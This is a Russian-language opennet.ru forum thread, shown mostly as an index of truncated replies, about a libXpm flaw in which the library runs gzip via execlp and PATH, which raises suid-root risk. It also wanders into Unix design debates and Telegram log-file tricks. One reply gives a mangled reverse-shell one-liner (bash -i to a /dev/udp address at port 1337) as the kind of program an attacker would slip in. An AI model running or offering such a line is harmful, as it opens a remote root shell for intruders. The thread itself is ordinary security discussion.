forum.opennet.ru

"Уязвимость в libXpm, приводящая к выполнению кода"

Форум Разговоры, обсуждение новостей
Версия для распечатки	Пред. тема \| След. тема

Исходное сообщение

[ Отслеживать ]

Заметили полезную информацию ? Пожалуйста добавьте в FAQ на WIKI.

. "Уязвимость в libXpm, приводящая к выполнению кода"	+/–
Сообщение от Аноним (103), 22-Янв-23, 16:06
Ну "почти" не почти, беру первый попавшийся сервер со свежайшим RHEL 9 и все еще вижу сьюды в рута в программах, которые используются постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab, su, passwd/gpasswd, fusermount. Впрочем, полагаю что CAP_SETUID, позволяющий сменить uid на рута, это настолько сильная операция, что тут безопасности от отказа от сьюд почти и не будет (хотя какие-то эксплоиты, наверное, предотвратить можно).
Ответить \| Правка \| Наверх \| Cообщить модератору

Оглавление

Уязвимость в libXpm, приводящая к выполнению кода, opennews, 21-Янв-23, 11:12 [смотреть все]

Это кто такой умный ставит левым прогам суид-рут , Аноним, 21-Янв-23, 11:12 (1) //
- Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере испо, Аноним, 21-Янв-23, 12:07 (4) //
  - И много у тебя троянов внутри суидных прог , Аноним, 21-Янв-23, 14:12 (18)
  - Вот в какой suid ной программе она могла бы потребоваться Даже если забыть о то, Аноним, 22-Янв-23, 00:33 (80) //
    - Ну почти не почти, беру первый попавшийся сервер со свежайшим RHEL 9 и все еще , Аноним, 22-Янв-23, 16:06 (103)
      - И которой из них сабжа надо , Аноним, 24-Янв-23, 04:19 (113)
- а спроси ни кто не заметил, что даже если дать local share TelegramDesktop lo, dannyD, 21-Янв-23, 18:19 (49) //
  - Потому что ты ничего не понимаешь Права на каталог TelegramDesktop - чьи Вот ч, Аноним, 21-Янв-23, 19:57 (55) //
    - спсзы я не админ, я оффтоп не люблю ззы совсем не люблю , dannyD, 21-Янв-23, 20:23 (56)
    - а можно чиста каннеретна _ _ что сделать, чтоб в файле нулевой длины l, dannyD, 22-Янв-23, 00:31 (79)
      - Гугли setattr, Perlovka, 22-Янв-23, 13:40 (100)
      - частенько встречается такая задача, погасить неуёмное приложение Инструменты вс, Аноним, 24-Янв-23, 05:28 (115)
      - sudo chattr ai path to file, Аноним, 25-Янв-23, 04:59 (119)
  - А owner у него кто Chattr i ему поставь Или если не хочется чтобы там что-то б, Аноним, 21-Янв-23, 22:37 (64) //
    - спс, разорбрался конкретно телеграмм отказывается запускаться с отбитым логом , dannyD, 22-Янв-23, 14:08 (101)
      - очень, очень наглый кусок дуровкода а если залинковать это в dev null rm -f -, ivan_erohin, 23-Янв-23, 17:15 (107)
        
        разумеется сслыка будет прибита, а на ёё месте будет новый файл PS это первое, , dannyD, 23-Янв-23, 22:12 (110)
        тоже самое с xsession-errors от lightdmлечится ковырянием сырца с переносом в, dannyD, 23-Янв-23, 22:19 (111)
      - Ггг лол, ну, я бы если пользовался этим крапом вгрузил бы LD_PRELOAD ом libfxxxo, Аноним, 24-Янв-23, 04:23 (114)
        
        нихтфирштейн , dannyD, 24-Янв-23, 07:48 (116)
Ну а это вообще жесть , Аноним, 21-Янв-23, 11:13 (2) //
- По сути, не отличается от подмены утилиты или библиотеки на левую Вы обречены , Аноним, 21-Янв-23, 12:01 (3) //
  - Вот с этого и надо было статью начинать сначала надо подменить систему , Аноним, 21-Янв-23, 14:14 (19)
- warning Пользователь может запустить под собой какую-то программу , An onymous, 21-Янв-23, 12:43 (11) //
  - Warning Программа с suid бит может запустить под root какую-то программу вместо, Аноним, 21-Янв-23, 16:34 (40) //
    - А что за программа-то , Admino, 21-Янв-23, 18:00 (47)
      - bash -i dev udp 1 2 3 4 1337 0 1, OpenEcho, 21-Янв-23, 18:36 (51)
        
        С правами рута и с использованием libXpm Отсыпь , Admino, 21-Янв-23, 19:38 (54)
        
        Но, тебе уже и так хватит Но если хочешь чтоб быстрей отпустило, дай доступ на, OpenEcho, 23-Янв-23, 19:35 (108)
        
        Так вот мне и интересно было, где это в дистрибутивах встречается графическая ту, Admino, 23-Янв-23, 19:45 (109)
        
        А-а-а, вы о этом, сори, не понял к сожалению помимо безобидного текстового XP, OpenEcho, 25-Янв-23, 00:03 (117)
        
        Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения , Admino, 25-Янв-23, 00:08 (118)
        
        Это usr bin passwd текстовая утилита А мы разве не отошли он libXPM и говорим , OpenEcho, 25-Янв-23, 19:55 (121)
        
        Это троллинг тупостью Да, usr bin passwd - это текстовая утилита Для эксплуата, Admino, 25-Янв-23, 20:01 (122)
        О-о-о, понятно, еще один умный пуп, ну-ну смакуй дальше сам какой ты умный , OpenEcho, 26-Янв-23, 00:28 (123)
Ядро - одна большая чёрная дырка Остальные проги тоже, даже sudo который со вре, Аноним, 21-Янв-23, 12:11 (5) //
- Без таких нытиков как ты - нормально жить, Аноним, 21-Янв-23, 12:22 (6)
- Зуммер узнал, что мир не идеален, деанон, 21-Янв-23, 12:39 (9) //
  - Да откудаж вы рождаетесь то инородные такие, что аж каждый вдох и выдох это уже , Аноним, 21-Янв-23, 12:50 (12)
- Хорошо жить на Винде 11, Аноним, 21-Янв-23, 12:41 (10) //
  - Естественно, ведь на Винде нет дыр Весь мир знает, что Майкрософт -- это фирма , Анатолий Цыбин, 21-Янв-23, 12:52 (13) //
    - Ну не просто же так в линуксе демоны, Аноним, 21-Янв-23, 15:14 (35)
      - И зомби И в винде иконки и службы , Admino, 21-Янв-23, 17:59 (46)
- А в стенах камеры ещё , Аноним, 21-Янв-23, 13:12 (15)
- Ога, блин, выполняет запросы программ, такое сякое Если запросы программ не вып, Аноним, 21-Янв-23, 22:39 (65)
- Так что можно позапускать и виндовые трояны милые сердцу прожженого маздайца Ту, Аноним, 22-Янв-23, 00:39 (82)
Ну они скоро подарят всяким докерам фичу невозможности пользователю менять перем, Ананоним, 21-Янв-23, 13:08 (14) //
- Да пусть меняет PATH, сколько влезет Вопрос в другом какого фига разрешено нед, Аноним, 21-Янв-23, 14:17 (20) //
  - Да не, ну это херня, у меня другой вопрос каким образом этот юзер себе suid roo, Омномним, 21-Янв-23, 15:07 (33) //
    - Как это в чем А эксплоит запускает тогда что Шелл хостинги не дают запускать и, GOrilla, 21-Янв-23, 16:42 (41)
Ну это вообще смузикод из 80ых что-ли system gzip my shit А всё потому ч, InuYasha, 21-Янв-23, 13:25 (16) //
- А как ты себе это представляешь в принципе Абсолютно все утилиты на компе должн, Аноним, 21-Янв-23, 14:19 (21) //
  - В Винде можно dll связать с другой dll В java можно динамически загружать нативн, Аноним, 21-Янв-23, 14:52 (27) //
    - Офигеть, вот это круто Это dlopen что-ли , Аноним, 21-Янв-23, 19:14 (53)
      - System loadLibrary, Аноним, 22-Янв-23, 10:40 (95)
    - ну вон в винде дллки также инжектят разница-то в чем , Sw00p aka Jerom, 21-Янв-23, 20:38 (57)
    - Потому что unix это не винда, Аноним, 21-Янв-23, 22:34 (63)
    - В Linux тоже так можно И чего Да охренеть В нативных программах, только подума, Аноним, 21-Янв-23, 22:47 (71)
  - В идеальном мире - примерно да Функции, алгоритмы, код - в ДЛЛках, CLI и фронте, InuYasha, 21-Янв-23, 14:55 (29)
  - В данном случае распаковка не является задачей libXpm Программа может напрямую , Аноним, 21-Янв-23, 17:13 (45)
  - В полноценных операционных системах еще с 90х годов у каждой программы нужные би, Аноним, 21-Янв-23, 22:45 (70)
Гос пади, xpm - это битмапы в формате сишного массива что-ли JSON и смузихлёбст, InuYasha, 21-Янв-23, 13:30 (17) //
- И я его обожаю В CDE божественные xpm ные иконки, Аноним, 21-Янв-23, 14:20 (22) //
  - А если бы они были png шные, было бы не то , Аноним, 22-Янв-23, 09:47 (92) //
    - ощущения не те, Аноним, 22-Янв-23, 13:32 (99)
- Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo , Аноним, 21-Янв-23, 14:24 (23) //
  - Да это-то понятно Просто вспомнил, что xpm такое Пока у тебя диск завален xpm-, InuYasha, 21-Янв-23, 14:51 (26)
Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя, Аноним, 21-Янв-23, 14:42 (24) //
- Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, кото, Аноним, 21-Янв-23, 15:07 (32)
- А что не так У вас там в расте особенности работы с памятью, а у нас особенност, Аноним, 21-Янв-23, 18:05 (48)
- Верно, классическая UNIX, позволяет менять алгоритм сжатия без изменения кода пр, Аноним, 21-Янв-23, 22:40 (66) //
  - Менять алгоритм сжатия на запуск произвольного кода , Аноним, 22-Янв-23, 10:36 (94)
- Может быть истинно понятная и безопасная ОС и должна так работать, без всяких шу, kusb, 23-Янв-23, 14:43 (106)
Вон из профессии за такое решение Вон из профессии за такой фикс , Аноним, 21-Янв-23, 14:44 (25) //
- А если бы они использовали другой язык проблем было бы ещё больше В том числе с, Аноним, 21-Янв-23, 15:28 (36) //
  - Какой нахрен другой язык, им дали zlib - нет хочу дёргать exec Необучаемые , Аноним, 21-Янв-23, 16:27 (39) //
    - Положить zlib so в PATH Повторить эксперимент, Аноним, 21-Янв-23, 23:34 (75)
      - ldconfig использует PATH , Аноним, 21-Янв-23, 23:36 (77)
- Давай tar ещё выгони, дурик , Аноним, 21-Янв-23, 22:41 (68) //
  - tar давно ффтопку, ибо его разрабы не понимают в архитектуре и делали его абы-ка, Аноним, 22-Янв-23, 10:47 (96)
при обработке файлов XPM Z или XPM gz библиотека при помощи вызова execlp запу, Омномним, 21-Янв-23, 15:03 (30) //
- Ну, тогда бы сейчас бы читали новость об очередном переполнении int и выходы за , Аноним, 21-Янв-23, 15:11 (34) //
  - Выходить Не надо так , Аноним, 21-Янв-23, 15:29 (37)
  - Пока что только новость о выходе за пределы сознания , Омномним, 24-Янв-23, 00:11 (112)
Офигенный код и офигенный фикс Кто там пыхеров и жсников за eval ругал Ваш вы, Анонн, 21-Янв-23, 16:15 (38) //
- В это проблема GNU Xorg библиотек Десятки тысяч исходных кодов, которые не вери, Аноним, 21-Янв-23, 17:12 (44) //
  - У вейланда другая проблема - падает и глючит , Аноним, 22-Янв-23, 10:48 (97)
  - Конечно, FSF был бы не против этого , Аноним, 23-Янв-23, 13:08 (105)
А ведь можно было использовать библиотеки реализующие декомпрессию z gz и не выз, Аноним, 21-Янв-23, 17:09 (43) //
- Юникс вэй Утилита утилита утилита , Аноним, 21-Янв-23, 21:10 (60) //
  - Утилита утилита утилита You re pwned, Аноним, 21-Янв-23, 22:47 (72)
Блеск и нищета опенсорса Врачи пишут планировщики задач, студни и всякие бoмжы п, Аноним, 21-Янв-23, 22:11 (61) //
- Зато в ынтерпрайзе всё не так Сеньёры молятся на новые версии библиотек и дают , Аноним, 21-Янв-23, 22:17 (62) //
  - В ынтерплайзе никто не будет писать либу просто так По крайней мере в рабочее в, Аноним, 21-Янв-23, 22:40 (67) //
    - Свободный и бесплатный это разные вещи , Аноним, 21-Янв-23, 22:42 (69)
      - А я и не утверждал, что это одинаковые вещи Просто настоящих идейных крайне мало, Аноним, 21-Янв-23, 22:59 (73)
      - Это же все видно Посмотрите сколько пользователей у того же firefox, и сколько у, Аноним, 21-Янв-23, 23:09 (74)
        
        Свобода, за которую надо платить - это платная временная вольная от хозяинаПо ко, Бывалый смузихлёб, 22-Янв-23, 05:26 (86)
        
        А потому что это не правда The number of unpaid developers may be stabilizing,, Аноним, 22-Янв-23, 09:16 (90)
        А потому что они копируют корпоративную структуру от которой и получают деньги П, Аноним, 22-Янв-23, 09:28 (91)
        
        Раньше на сайте Криты писалась сумма пожертвований Потом вроде убрали, чтобы не, Аноним, 22-Янв-23, 09:50 (93)
    - дык за деньги жев отечественном ынтерпрайзе токо и делают, что используют беспла, Аноним, 21-Янв-23, 23:35 (76)
    - АХАХАХАХА, Аноним, 21-Янв-23, 23:46 (78)
    - Однако в лицензиях проприетарного софта почему-то написано про AS IS Да, некото, Аноним, 22-Янв-23, 00:41 (83)
    - То-то у ынтерплайза сейчас версионная диарея , Аноним, 22-Янв-23, 00:50 (84)
    - Ну почему же, вполне будет Только если это не согласовано с конторой, либо будут, Бывалый смузихлёб, 22-Янв-23, 05:31 (87)
    - D D D D D Не реально смешно Чел никогда не видел ынтерплайза Зачастую, он, хрю, 22-Янв-23, 14:23 (102)
- Святая наивность, ты никогда не видел коммерческой разработки изнутри , Аноним, 22-Янв-23, 01:42 (85)
- https xkcd com 2347 , Аноним, 22-Янв-23, 12:01 (98)
Странно, что не написали сколько лет этой уязвимости , Alex, 22-Янв-23, 06:13 (88) //
- Или им было стыдно это писать,или все кто знал уже ущли на пенсию , Аноним, 22-Янв-23, 08:11 (89)
- замена системных экзешников на троянов Да постарше тебя уж , Аноним, 23-Янв-23, 00:15 (104)
Угар, конечно, как в тут папуасы ругают классику программирования под юникс 82, Аноним, 25-Янв-23, 05:12 (120)

Форумы | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру